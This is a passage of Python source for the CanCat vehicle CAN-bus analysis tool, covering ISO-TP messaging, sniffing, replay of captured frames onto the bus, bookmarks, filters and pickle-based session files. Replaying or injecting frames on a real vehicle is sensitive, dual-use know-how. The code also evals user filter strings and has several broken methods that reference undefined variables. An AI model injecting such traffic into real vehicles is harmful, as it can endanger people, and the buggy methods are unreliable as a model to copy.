self._send(CMD_CAN_SEND_ISOTP, msg)
ts, result = self.recv(CMD_CAN_SEND_ISOTP_RESULT, timeout)
if result == None:
print("ISOTPxmit: Return is None!?")
resval = ord(result)
if resval != 0:
print("ISOTPxmit() failed: %s" % CAN_RESPS.get(resval))
return resval
def ISOTPrecv(self, tx_arbid, rx_arbid, extflag=0, timeout=3, count=1, start_msg_idx=None):
'''
Receives an ISOTP can message. This function just causes
the hardware to send the appropriate flow control command
when an ISOTP frame is received from rx_arbid, using
tx_arbid for the flow control frame. The ISOTP frame
itself needs to be extracted from the received can messages
'''
if start_msg_idx is None:
start_msg_idx = self.getCanMsgCount()
# set the CANCat to respond to Flow Control messages
resval = self._isotp_enable_flowcontrol(tx_arbid, rx_arbid, extflag)
msg = self._getIsoTpMsg(rx_arbid, start_index=start_msg_idx, timeout=timeout)
return msg
def _isotp_enable_flowcontrol(self, tx_arbid, rx_arbid, extflag):
msg = struct.pack('>IIB', tx_arbid, rx_arbid, extflag)
self._send(CMD_CAN_RECV_ISOTP, msg)
ts, result = self.recv(CMD_CAN_RECV_ISOTP_RESULT, timeout)
if result == None:
print("_isotp_enable_flowcontrol: Return is None!?")
resval = ord(result)
if resval != 0:
print("_isotp_enable_flowcontrol() failed: %s" % CAN_RESPS.get(resval))
return resval
def ISOTPxmit_recv(self, tx_arbid, rx_arbid, message, extflag=0, timeout=3, count=1, service=None):
'''
Transmit an ISOTP can message, then wait for a response.
tx_arbid is the arbid we're transmitting, and rx_arbid
is the arbid we're listening for
'''
currIdx = self.getCanMsgCount()
msg = struct.pack('>II', tx_arbid, rx_arbid) + struct.pack('B', extflag) + self._bytesHelper(message)
for i in range(count):
self._send(CMD_CAN_SENDRECV_ISOTP, msg)
ts, result = self.recv(CMD_CAN_SENDRECV_ISOTP_RESULT, timeout)
if result == None:
print("ISOTPxmit: Return is None!?")
resval = ord(result)
if resval != 0:
print("ISOTPxmit() failed: %s" % CAN_RESPS.get(resval))
msg, idx = self._isotp_get_msg(rx_arbid, start_index = currIdx, service = service, timeout = timeout)
return msg, idx
def _isotp_get_msg(self, rx_arbid, start_index=0, service=None, timeout=None):
'''
Internal Method to piece together a valid ISO-TP message from received CAN packets.
'''
found = False
complete = False
starttime = lasttime = time.time()
while not complete and (not timeout or (lasttime-starttime < timeout)):
time.sleep(0.01)
msgs = [msg for msg in self.genCanMsgs(start=start_index, arbids=[rx_arbid])]
if len(msgs):
try:
# Check that the message is for the expected service, if specified
arbid, msg, count = iso_tp.msg_decode(msgs)
if msg[0] == 0x7e: # response for TesterPresent... ignore
start_index = msgs[count-1][0] + 1
elif service is not None:
# Check if this is the right service, or there was an error
if msg[0] == service or msg[0] == 0x7f:
msg_found = True
return msg, msgs[count-1][0]
print("Hey, we got here, wrong service code?")
start_index = msgs[count-1][0] + 1
else:
msg_found = True
return msg, msgs[count-1][0]
except iso_tp.IncompleteIsoTpMsg as e:
#print(e) # debugging only, this is expected
pass
lasttime = time.time()
#print("_isotp_get_msg: status: %r - %r (%r) > %r" % (lasttime, starttime, (lasttime-starttime), timeout))
if self.verbose:
print("_isotp_get_msg: Timeout: %r - %r (%r) > %r" % (lasttime, starttime, (lasttime-starttime), timeout))
return None, start_index
def CANsniff(self, start_msg=None, arbids=None, advfilters=[], maxmsgs=None):
'''
Print messages in real time.
start_msg - first message to print
(None: the next message captured, 0: first message since starting CanCat)
arbids - list of arbids to print (others will be ignored)
advfilters - list of python code to eval for each message (message context provided)
eg. ['pf==0xeb', 'sa==0', 'ps & 0xf']
will print TP data message from source address 0 if the top 4 bits of PS
are set.
Expressions are evaluated from left to right in a "and" like fashion. If any
expression evaluates to "False" and the message will be ignored.
Variables mapped into default namespace:
'arbid'
'id'
'ts'
'data'
J1939 adds 'pgn', 'pf', 'ps', 'edp', 'dp', 'sa'
(this description is true for all advfilters, not specifically CANsniff)
'''
count = 0
msg_gen = self.reprCanMsgsLines(start_msg=start_msg, arbids=arbids, advfilters=advfilters, tail=True)
while True:
if maxmsgs != None and maxmsgs < count:
return
line = next(msg_gen)
print(line)
count += 1
if keystop():
break
def CANreplay(self, start_bkmk=None, stop_bkmk=None, start_msg=0, stop_msg=None, arbids=None, timing=TIMING_FAST):
'''
Replay packets between two bookmarks.
timing = TIMING_FAST: just slam them down the CAN bus as fast as possible
timing = TIMING_READ: send the messages using similar timing to how they
were received
timing = TIMING_INTERACTIVE: wait for the user to press Enter between each
message being transmitted
timing = TIMING_SEARCH: wait for the user to respond (binary search)
'''
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
if timing == TIMING_SEARCH:
diff = stop_msg - start_msg
if diff == 1:
mid_msg = stop_msg
start_tmp = start_msg
else:
mid_msg = int(start_msg + math.floor((stop_msg - start_msg) / 2))
start_tmp = start_msg
start_msg = mid_msg
last_time = -1
newstamp = time.time()
for idx,ts,arbid,data in self.genCanMsgs(start_msg, stop_msg, arbids=arbids):
laststamp = newstamp
newstamp = time.time()
delta_correction = newstamp - laststamp
if timing == TIMING_INTERACTIVE:
char = input("Transmit this message? %s (Y/n)" % reprCanMsg(idx, ts, arbid, data))
if char is not None and len(char) > 0 and char[0] == 'n':
return
elif timing == TIMING_SEARCH:
self.CANreplay(start_msg=mid_msg, stop_msg=stop_msg)
char = input("Expected outcome? start_msg = %s, stop_msg = %s (Y/n/q)" % (mid_msg, stop_msg))
if char is not None and len(char) > 0 and char[0] == 'q':
return
if diff > 1:
if char is not None and len(char) > 0 and char[0] == 'y':
return self.CANreplay(start_msg=mid_msg, stop_msg=stop_msg, timing=TIMING_SEARCH)
elif char is not None and len(char) > 0 and char[0] == 'n':
return self.CANreplay(start_msg=start_tmp, stop_msg=mid_msg, timing=TIMING_SEARCH)
else:
if char is not None and len(char) > 0 and char[0] == 'y':
print("Target message: %s" % (stop_msg))
return
elif char is not None and len(char) > 0 and char[0] == 'n':
print("Target message: %s" % (start_tmp))
return
elif timing == TIMING_REAL:
if last_time != -1:
delta = ts - last_time - delta_correction
if delta >= 0:
time.sleep(delta)
last_time = ts
self.CANxmit(arbid, data)
if timing == TIMING_INTERACTIVE:
print("Message transmitted")
def setCanBaud(self, baud_const=CAN_500KBPS):
'''
set the baud rate for the CAN bus. this has nothing to do with the
connection from the computer to the tool
'''
baud = struct.pack("B", baud_const)
self._send(CMD_CAN_BAUD, baud)
response = self.recv(CMD_CAN_BAUD_RESULT, wait=30)
self._config['can_baud'] = baud_const
while(response[1] != b'\x01'):
print("CAN INIT FAILED: Retrying")
response = self.recv(CMD_CAN_BAUD_RESULT, wait=30)
def setCanMode(self, mode):
'''
Sets the desired operation mode. Note that just setting the operational mode
does not change anything on the hardware, after changing the mode you must change
the baud rate in order to properly configure the hardware
'''
CAN_MODES = { v: k for k,v in globals().items() if k.startswith('CMD_CAN_MODE_') and k != 'CMD_CAN_MODE_RESULT' }
if mode not in CAN_MODES:
print("{} is not a valid can mode. Valid modes are:".format(mode))
for k in CAN_MODES:
print("{} ({})".format(CAN_MODES[k], k))
else:
self._send(CMD_CAN_MODE, chr(mode))
response = self.recv(CMD_CAN_MODE_RESULT, wait=30)
while(response[1] != b'\x01'):
print("CAN INIT FAILED: Retrying")
response = self.recv(CMD_CAN_MODE_RESULT, wait=30)
self._config['can_mode'] = mode
return response
def ping(self, buf='ABCDEFGHIJKL'):
'''
Utility function, only to send and receive data from the
CanCat Transceiver. Has no effect on the CAN bus
'''
buf = self._bytesHelper(buf)
self._send(CMD_PING, buf)
response = self.recv(CMD_PING_RESPONSE, wait=3)
return response
def genCanMsgs(self, start=0, stop=None, arbids=None, tail=False, maxsecs=None):
'''
CAN message generator. takes in start/stop indexes as well as a list
of desired arbids (list)
maxsecs limits the number of seconds this generator will go for. it's intended
for use with tail
'''
messages = self.getCanMsgQueue()
# get the ts of the first received message
if messages != None and len(messages):
startts = messages[0][0]
else:
startts = time.time()
if start == None:
start = self.getCanMsgCount()
if messages == None:
stop = 0
elif stop == None or tail:
stop = len(messages)
else:
stop = stop + 1 # This makes the stop index inclusive if specified
starttime = time.time()
idx = start
while tail or idx < stop:
# obey our time restrictions
# placed here to ensure checking whether we're receiving messages or not
if maxsecs != None and time.time() > maxsecs+starttime:
return
# If we start sniffing before we receive any messages,
# messages will be "None". In this case, each time through
# this loop, check to see if we have messages, and if so,
# re-create the messages handle
if messages == None:
messages = self._messages.get(self._msg_source_idx, None)
# if we're off the end of the original request, and "tailing"
if messages != None:
if tail and idx >= stop:
msglen = len(messages)
self.log("stop=%d len=%d" % (stop, msglen), 3)
if stop == msglen:
self.log("waiting for messages", 3)
# wait for trigger event so we're not constantly polling
self._msg_events[self._msg_source_idx].wait(1)
self._msg_events[self._msg_source_idx].clear()
self.log("received 'new messages' event trigger", 3)
# we've gained some messages since last check...
stop = len(messages)
continue # to the big message loop.
# now actually handle messages
ts, msg = messages[idx]
# make ts an offset instead of the real time.
ts -= startts
arbid, data = self._splitCanMsg(msg)
if arbids != None and arbid not in arbids:
# allow filtering of arbids
idx += 1
continue
yield((idx, ts, arbid, data))
idx += 1
def _splitCanMsg(self, msg):
'''
takes in captured message
returns arbid and data
does not check msg size. MUST be at least 4 bytes in length as the
tool should send 4 bytes for the arbid
'''
arbid = struct.unpack(">I", msg[:4])[0]
data = msg[4:]
return arbid, data
def getCanMsgQueue(self):
'''
returns the list of interface/CAN messages for this object
for CanInterface, this is self._messages[CMD_CAN_RECV]
'''
return self._messages.get(self._msg_source_idx)
def getCanMsgCount(self):
'''
the number of CAN messages we've received this session
'''
canmsgs = self._messages.get(self._msg_source_idx, [])
return len(canmsgs)
def printSessionStatsByBookmark(self, start=None, stop=None):
'''
Prints session stats only for messages between two bookmarks
'''
print(self.getSessionStatsByBookmark(start, stop))
def printSessionStats(self, start=0, stop=None):
'''
Print session stats by Arbitration ID (aka WID/PID/CANID/etc...)
between two message indexes (where they sit in the CMD_CAN_RECV
mailbox)
'''
print(self.getSessionStats(start, stop))
def getSessionStatsByBookmark(self, start=None, stop=None):
'''
returns session stats by bookmarks
'''
if start != None:
start_msg = self.getMsgIndexFromBookmark(start)
else:
start_msg = 0
if stop != None:
stop_msg = self.getMsgIndexFromBookmark(stop)
else:
stop_msg = self.getCanMsgCount()
return(self.getSessionStats(start=start_msg, stop=stop_msg))
def getArbitrationIds(self, start=0, stop=None, reverse=False):
'''
return a list of Arbitration IDs
'''
arbids = {}
msg_count = 0
for idx,ts,arbid,data in self.genCanMsgs(start, stop):
arbmsgs = arbids.get(arbid)
if arbmsgs == None:
arbmsgs = []
arbids[arbid] = arbmsgs
arbmsgs.append((ts, data))
msg_count += 1
arbid_list = [(len(msgs), arbid, msgs) for arbid,msgs in arbids.items()]
arbid_list.sort(reverse=reverse)
return arbid_list
def getSessionStats(self, start=0, stop=None):
out = []
arbid_list = self.getArbitrationIds(start=start, stop=stop, reverse=True)
for datalen, arbid, msgs in arbid_list:
last = 0
high = 0
low = 0xffffffff
for ts, data in msgs:
if last == 0:
last = ts
continue
# calculate the high and low
delta = ts - last
if delta > high:
high = delta
if delta < low:
low = delta
# track repeated values (rounded to nearest .001 sec)
last = ts
if datalen > 1:
mean = (msgs[-1][0] - msgs[0][0]) / (datalen-1)
median = low + (high-low) / 2
else:
low = 0
mean = 0
median = mean
out.append("id: 0x%x\tcount: %d\ttiming:: mean: %.3f\tmedian: %.3f\thigh: %.3f\tlow: %.3f" % \
(arbid, datalen, mean, median, high, low))
msg_count = self.getCanMsgCount()
out.append("Total Uniq IDs: %d\nTotal Messages: %d" % (len(arbid_list), msg_count))
return '\n'.join(out)
# TODO files still lacking compatibility between Python 2 and 3
def loadFromFile(self, filename, force=False):
'''
Load a previous analysis session from a saved file
see: saveSessionToFile()
'''
loadedFile = open(filename, 'rb')
me = pickle.load(loadedFile)
self.restoreSession(me, force=force)
self._filename = filename
def restoreSession(self, me, force=False):
'''
Load a previous analysis session from a python dictionary object
see: saveSession()
'''
if isinstance(self._io, serial.Serial) and force==False:
print("Refusing to reload a session while active session! use 'force=True' option")
return
self._messages = me.get('messages')
self.bookmarks = me.get('bookmarks')
self.bookmark_info = me.get('bookmark_info')
self.comments = me.get('comments')
# handle previous versions
ver = me.get('file_version')
if ver is not None:
self._config = me.get('config')
for cmd in self._messages:
self._msg_events[cmd] = threading.Event()
def saveSessionToFile(self, filename=None):
'''
Saves the current analysis session to the filename given
If saved previously, the name will already be cached, so it is
unnecessary to provide it again.
'''
if filename != None:
self._filename = filename
elif self._filename == None:
raise Exception('Cannot save to file when no filename given (and first time save)')
else:
filename = self._filename
savegame = self.saveSession()
me = pickle.dumps(savegame)
outfile = open(filename, 'wb')
outfile.write(me)
outfile.close()
def saveSession(self):
'''
Save the current analysis session to a python dictionary object
What you do with it form there is your own business.
This function is called by saveSessionToFile() to get the data
to save to the file.
'''
savegame = { 'messages' : self._messages,
'bookmarks' : self.bookmarks,
'bookmark_info' : self.bookmark_info,
'comments' : self.comments,
'file_version' : 1.0,
'class' : self.__class__,
'config' : self._config,
}
return savegame
# bookmark subsystem
def placeCanBookmark(self, name=None, comment=None):
'''
Save a named bookmark (with optional comment).
This stores the message index number from the
CMD_CAN_RECV mailbox.
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
mbox = self._messages.get(self._msg_source_idx)
if mbox == None:
msg_index = 0
else:
msg_index = len(mbox)
bkmk_index = len(self.bookmarks)
self.bookmarks.append(msg_index)
info = { 'name' : name,
'comment' : comment }
self.bookmark_info[bkmk_index] = info #should this be msg_index? benefit either way?
return bkmk_index
def getMsgIndexFromBookmark(self, bkmk_index):
return self.bookmarks[bkmk_index]
def getBookmarkFromMsgIndex(self, msg_index):
bkmk_index = self.bookmarks.index(msg_index)
return bkmk_index
def setCanBookmarkName(self, bkmk_index, name):
info = self.bookmark_info[bkmk_index]
info[name] = name
def setCanBookmarkComment(self, bkmk_index, comment):
info = self.bookmark_info[bkmk_index]
info[name] = name
def setCanBookmarkNameByMsgIndex(self, msg_index, name):
bkmk_index = self.bookmarks.index(msg_index)
info = self.bookmark_info[bkmk_index]
info[name] = name
def setCanBookmarkCommentByMsgIndex(self, msg_index, comment):
bkmk_index = self.bookmarks.index(msg_index)
info = self.bookmark_info[bkmk_index]
info[name] = name
def snapshotCanMessages(self, name=None, comment=None):
'''
Save bookmarks at the start and end of some event you are about to do
Bookmarks are named "Start_" + name and "Stop_" + name
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
start_bkmk = self.placeCanBookmark("Start_" + name, comment)
input("Press Enter When Done...")
stop_bkmk = self.placeCanBookmark("Stop_" + name, comment)
def filterCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
else:
stop_bkmk = -1
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmark(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmark(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.filterCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def _getLocals(self, idx, ts, arbid, data):
return {'idx':idx, 'ts':ts, 'arbid':arbid, 'data':data}
def filterCanMsgs(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], tail=False, maxsecs=None):
'''
returns the received CAN messages between indexes "start_msg" and "stop_msg"
but only messages to ID's that *do not* appear in the the baseline indicated
by "start_baseline_msg" and "stop_baseline_msg".
for message indexes, you *will* want to look into the bookmarking subsystem!
'''
self.log("starting filtering messages...")
if stop_baseline_msg != None:
self.log("ignoring arbids from baseline...")
# get a list of baseline arbids
filter_ids = { arbid:1 for idx,ts,arbid,data in self.genCanMsgs(start_baseline_msg, stop_baseline_msg)
}.keys()
else:
filter_ids = None
self.log("filtering messages...")
if arbids != None and type(arbids) != list:
arbids = [arbids]
for idx,ts,arbid,msg in self.genCanMsgs(start_msg, stop_msg, arbids=arbids, tail=tail, maxsecs=maxsecs):
if not ((arbids != None and arbid in arbids) or arbid not in ignore and (filter_ids==None or arbid not in filter_ids)):
self.log("skipping message: (%r, %r, %r, %r)" % ((idx, ts, arbid, msg)))
continue
# advanced filters allow python code to be handed in. if any of the python code snippits result in "False" or 0, skip this message
skip = False
for advf in advfilters:
lcls = self._getLocals(idx, ts, arbid, msg)
if not eval(advf, lcls):
skip = True
if skip:
self.log("skipping message(adv): (%r, %r, %r, %r)" % ((idx, ts, arbid, msg)))
continue
yield (idx, ts, arbid, msg)
def printCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use printCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
print(self.reprCanMsgsByBookmark(start_bkmk, stop_bkmk, start_baseline_bkmk, stop_baseline_bkmk, arbids, ignore, advfilters))
def reprCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None, arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use reprCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
out = []
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
else:
stop_bkmk = -1
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmark(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmark(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.reprCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def printCanMsgs(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, paginate=None, viewbits=VIEW_ALL):
data = self.reprCanMsgsLines(start_msg, stop_msg, start_bkmk, stop_bkmk, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters, pretty, viewbits=viewbits)
pidx = 0
try:
while True:
line = next(data)
lines = line.split('\n')
for thing in lines:
print(thing)
pidx += 1
if paginate != None and pidx % paginate == 0:
inp = input("PRESS ENTER TO CONTINUE")
except StopIteration:
pass
def reprCanMsgsLines(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, tail=False, viewbits=VIEW_ALL):
# FIXME: make different stats selectable using a bitfield arg (eg. REPR_TIME_DELTA | REPR_ASCII)
'''
String representation of a set of CAN Messages.
These can be filtered by start and stop message indexes, as well as
use a baseline (defined by start/stop message indexes),
by a list of "desired" arbids as well as a list of
ignored arbids
Many functions wrap this one.
viewbits is a bitfield made up of VIEW_* options OR'd together:
... viewbits=VIEW_ASCII|VIEW_COMPARE)
'''
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
if (viewbits & VIEW_BOOKMARKS) and start_msg in self.bookmarks:
bkmk = self.bookmarks.index(start_msg)
yield ("starting from bookmark %d: '%s'" %
(bkmk,
self.bookmark_info[bkmk].get('name'))
)
if (viewbits & VIEW_BOOKMARKS) and stop_msg in self.bookmarks:
bkmk = self.bookmarks.index(stop_msg)
yield ("stoppng at bookmark %d: '%s'" %
(bkmk,
self.bookmark_info[bkmk].get('name'))
)
last_msg = None
next_bkmk = 0
next_bkmk_idx = 0
msg_count = 0
last_ts = None
tot_delta_ts = 0
counted_msgs = 0 # used for calculating averages, excluding outliers
data_delta = None
data_repeat = 0
data_similar = 0
for idx, ts, arbid, msg in self.filterCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids=arbids, ignore=ignore, advfilters=advfilters, tail=tail):
# insert bookmark names/comments in appropriate places
while next_bkmk_idx < len(self.bookmarks) and idx >= self.bookmarks[next_bkmk_idx]:
yield (self.reprBookmark(next_bkmk_idx))
next_bkmk_idx += 1
msg_count += 1
diff = []
# check data
byte_cnt_diff = 0
if (viewbits & VIEW_COMPARE) and last_msg != None:
if len(last_msg) == len(msg):
for bidx in range(len(msg)):
if last_msg[bidx] != msg[bidx]:
byte_cnt_diff += 1
if byte_cnt_diff == 0:
diff.append("REPEAT")
data_repeat += 1
elif byte_cnt_diff <=4:
diff.append("Similar")
data_similar += 1
# FIXME: make some better heuristic to identify "out of norm"
# look for ASCII data (4+ consecutive bytes)
if (viewbits & VIEW_ASCII) and hasAscii(msg):
diff.append("ASCII: %s" % repr(msg))
# calculate timestamp delta and comment if out of whack
if last_ts == None:
last_ts = ts
delta_ts = ts - last_ts
if counted_msgs:
avg_delta_ts = tot_delta_ts / counted_msgs
else:
avg_delta_ts = delta_ts
if abs(delta_ts - avg_delta_ts) <= delta_ts:
tot_delta_ts += delta_ts
counted_msgs += 1
elif (viewbits & VIEW_TS_DELTA):
diff.append("TS_delta: %.3f" % delta_ts)
if pretty:
if delta_ts >= .95:
yield ('')
msgrepr = self._reprCanMsg(idx, ts, arbid, msg, comment='\t'.join(diff))
# allow _reprCanMsg to return None to skip printing the message
if msgrepr != DONT_PRINT_THIS_MESSAGE:
yield msgrepr
last_ts = ts
last_msg = msg
if viewbits & VIEW_ENDSUM:
yield ("Total Messages: %d (repeat: %d / similar: %d)" % (msg_count, data_repeat, data_similar))
def reprCanMsgs(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, tail=False, viewbits=VIEW_ALL):
out = [x for x in self.reprCanMsgsLines(start_msg, stop_msg, start_bkmk, stop_bkmk, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters, pretty, tail, viewbits)]
return "\n".join(out)
def _reprCanMsg(self, idx, ts, arbid, msg, comment=None):
return reprCanMsg(idx, ts, arbid, msg, comment=comment)
def printCanSessions(self, arbid_list=None, advfilters=[]):
'''
Split CAN messages into Arbitration ID's and prints entire
sessions for each CAN id.
Defaults to printing by least number of messages, including all IDs
Or... provide your own list of ArbIDs in whatever order you like
'''
if arbid_list == None:
arbids = self.getArbitrationIds()
else:
arbids = [arbdata for arbdata in self.getArbitrationIds() if arbdata[1] in arbid_list]
for datalen,arbid,msgs in arbids:
print(self.reprCanMsgs(arbids=[arbid], advfilters=advfilters))
cmd = input("\n[N]ext, R)eplay, F)astReplay, I)nteractiveReplay, S)earchReplay, Q)uit: ").upper()
while len(cmd) and cmd != 'N':
if cmd == 'R':
self.CANreplay(arbids=[arbid], timing=TIMING_REAL)
elif cmd == 'F':
self.CANreplay(arbids=[arbid], timing=TIMING_FAST)
elif cmd == 'I':
self.CANreplay(arbids=[arbid], timing=TIMING_INTERACTIVE)
elif cmd == 'S':
self.CANreplay(arbids=[arbid], timing=TIMING_SEARCH)
elif cmd == 'Q':
return
cmd = input("\n[N]ext, R)eplay, F)astReplay, I)nteractiveReplay, S)earchReplay, Q)uit: ").upper()
print
def printBookmarks(self):
'''
Print out the list of current Bookmarks and where they sit
'''
print(self.reprBookmarks())
def printAsciiStrings(self, minbytes=4, strict=True):
'''
Search through messages looking for ASCII strings
'''
for idx, ts, arbid, msg in self.genCanMsgs():
if hasAscii(msg, minbytes=minbytes, strict=strict):
print(reprCanMsg(idx, ts, arbid, msg, repr(msg)))
def reprBookmarks(self):
'''
get a string representation of the bookmarks
'''
out = []
for bid in range(len(self.bookmarks)):
out.append(self.reprBookmark(bid))
return '\n'.join(out)
def reprBookmark(self, bid):
'''
get a string representation of one bookmark
'''
msgidx = self.bookmarks[bid]
info = self.bookmark_info.get(bid)
comment = info.get('comment')
if comment == None:
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s" % (bid, msgidx, info.get('name'))
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s \tcomment: %s" % (bid, msgidx, info.get('name'), info.get('comment'))
def setMaskAndFilter(self,
mask0=0,
mask1=0,
filter0=0,
filter1=0,
filter2=0,
filter3=0,
filter4=0,
filter5=0):
'''
Set the filters and masks. The mask determines which bits matter for the filter following the
below truth table:
_____________________________________________________________________________
| Mask Bit n | Filter Bit n | Arbitration ID bit n | Accept or Reject |
| 0 | X | X | Accept |
| 1 | 0 | 0 | Accept |
| 1 | 0 | 1 | Reject |
| 1 | 1 | 0 | Reject |
| 1 | 1 | 1 | Accept |
-----------------------------------------------------------------------------
There are two RX buffers. mask0 and filters 0 and 1 apply to buffer 0. mask1 and the other four filters
apply to buffer 1.
'''
msg = struct.pack('>IIIIIIII', mask0, mask1, filter0, filter1, filter2, filter3, filter4, filter5)
return self._send(CMD_SET_FILT_MASK, msg)
def clearMaskAndFilter(self):
'''
Clears all masks and filters
'''
msg = struct.pack('>IIIIIIII', 0, 0, 0, 0, 0, 0, 0, 0)
return self._send(CMD_SET_FILT_MASK, msg)
def _test_throughput(self):
'''
Use in conjuction with the M2_TEST_FW to test throughput
Connect one CanCat up to another M2 or Arduino DUE device runing the M2_TEST_FW firmware
and run this function to perform a throughput test. No other device should be connected
to allow the test to run unimpeded by other CAN traffic.
'''
self.clearCanMsgs()
self.CANxmit(0x0010, "TEST")
for i in range(6, 3, -1):
print("Time remaining: ", i*10, " seconds")
time.sleep(10)
self.CANxmit(0x810, "TEST", extflag=True)
for i in range(3, 0, -1):
print("Time remaining: ", i*10, " seconds")
time.sleep(10)
out_of_order_count = 0
msg_count = 0
prev_val = 0xFF
for foo in self.genCanMsgs(arbids=[0x00]):
msg_count += 1
prev_val += 1
if prev_val > 0xff:
prev_val = 0
if prev_val != foo[3]:
out_of_order_count += 1
prev_val = foo[3]
if (out_of_order_count > 0):
print("ERROR: 11 bit IDs, 1 byte messages, ", out_of_order_count, " Messages received out of order")
elif (msg_count != 181810):
print("ERROR: Received ", msg_count, " out of expected 181810 message")
else:
print("PASS: 11 bit IDs, 1 byte messages")
out_of_order_count = 0
msg_count = 0
prev_val = 0xFF
for foo in self.genCanMsgs(arbids=[0x01]):
msg_count += 1
prev_val += 1
if prev_val > 0xff:
prev_val = 0
if prev_val != foo[3][0]:
out_of_order_count += 1
prev_val = foo[3][0]
if (out_of_order_count > 0):
print("ERROR: 11 bit IDs, 8 byte messages, ", out_of_order_count, " Messages received out of order")
elif (msg_count != 90090):
print("ERROR: Received ", msg_count, " out of expected 90090 message")
else:
print("PASS: 11 bit IDs, 8 byte messages")
out_of_order_count = 0
msg_count = 0
prev_val = 0xFF
for foo in self.genCanMsgs(arbids=[0x800]):
msg_count += 1
prev_val += 1
if prev_val > 0xff:
prev_val = 0
if prev_val != foo[3]:
out_of_order_count += 1
prev_val = foo[3]
if (out_of_order_count > 0):
print("ERROR: 29 bit IDs, 1 byte messages, ", out_of_order_count, " Messages received out of order")
elif (msg_count != 133330):
print("ERROR: Received ", msg_count, " out of expected 133330 message")
else:
print("PASS: 29 bit IDs, 1 byte messages")
out_of_order_count = 0
msg_count = 0
prev_val = 0xFF
for foo in self.genCanMsgs(arbids=[0x801]):
msg_count += 1
prev_val += 1
if prev_val > 0xff:
prev_val = 0
if prev_val != foo[3][0]:
out_of_order_count += 1
prev_val = foo[3][0]
if (out_of_order_count > 0):
print("ERROR: 29 bit IDs, 8 byte messages, ", out_of_order_count, " Messages received out of order")
elif (msg_count != 76330):
print("ERROR: Received ", msg_count, " out of expected 76330 message")
else:
print("PASS: 29 bit IDs, 8 byte messages")
def _printCanRegs(self):
self._send(CMD_PRINT_CAN_REGS, "")
def _bytesHelper(self, msg):
if isinstance(msg, six.string_types):
if sys.version_info < (3, 0):
msg = bytes(msg)
else:
msg = bytes(msg, 'raw_unicode_escape')
return msg
def getAscii(msg, minbytes=3):
'''
if strict, every character has to be clean ASCII
otherwise, look for strings of at least minbytes in length
'''
strings = []
ascii_match = 0
ascii_count = 0
startidx = None
for bidx in range(len(msg)):
byte = msg[bidx]
if 0x20 <= byte < 0x7f:
if startidx == None:
startidx = bidx
ascii_count +=1
else:
# non printable char
# if we reached the magic threshold, package it
if ascii_count >= minbytes:
strings.append(msg[startidx:bidx])
# reset counters
ascii_count = 0
startidx = None
# in case we have a string all the way to the end
if ascii_count >= minbytes:
strings.append(msg[startidx:])
return strings
def hasAscii(msg, minbytes=3, strict=False):
'''
if minbytes == -1, every character has to be clean ASCII
otherwise, look for strings of at least minbytes in length
'''
ascii_match = 0
ascii_count = 0
for byte in msg:
if 0x20 <= byte < 0x7f:
ascii_count +=1
if ascii_count >= minbytes:
ascii_match = 1
else:
if strict:
return 0
ascii_count = 0
return ascii_match
def reprCanMsg(idx, ts, arbid, data, comment=None):
#TODO: make some repr magic that spits out known ARBID's and other subdata
if comment == None:
comment = ''
return "%.8d %8.3f ID: %.3x, Len: %.2x, Data: %-18s\t%s" % (idx, ts, arbid, len(data), binascii.hexlify(data), comment)
class FordInterface(CanInterface):
def setCanBaudHSCAN(self):
self.setCanBaud(CAN_500KBPS)
def setCanBaudMSCAN(self):
self.setCanBaud(CAN_125KBPS)
def setCanBaudICAN(self):
self.setCanBaud(CAN_500KBPS)
class GMInterface(CanInterface):
'''
DLC port:
SW-LS-CAN - pin 1 33kbps
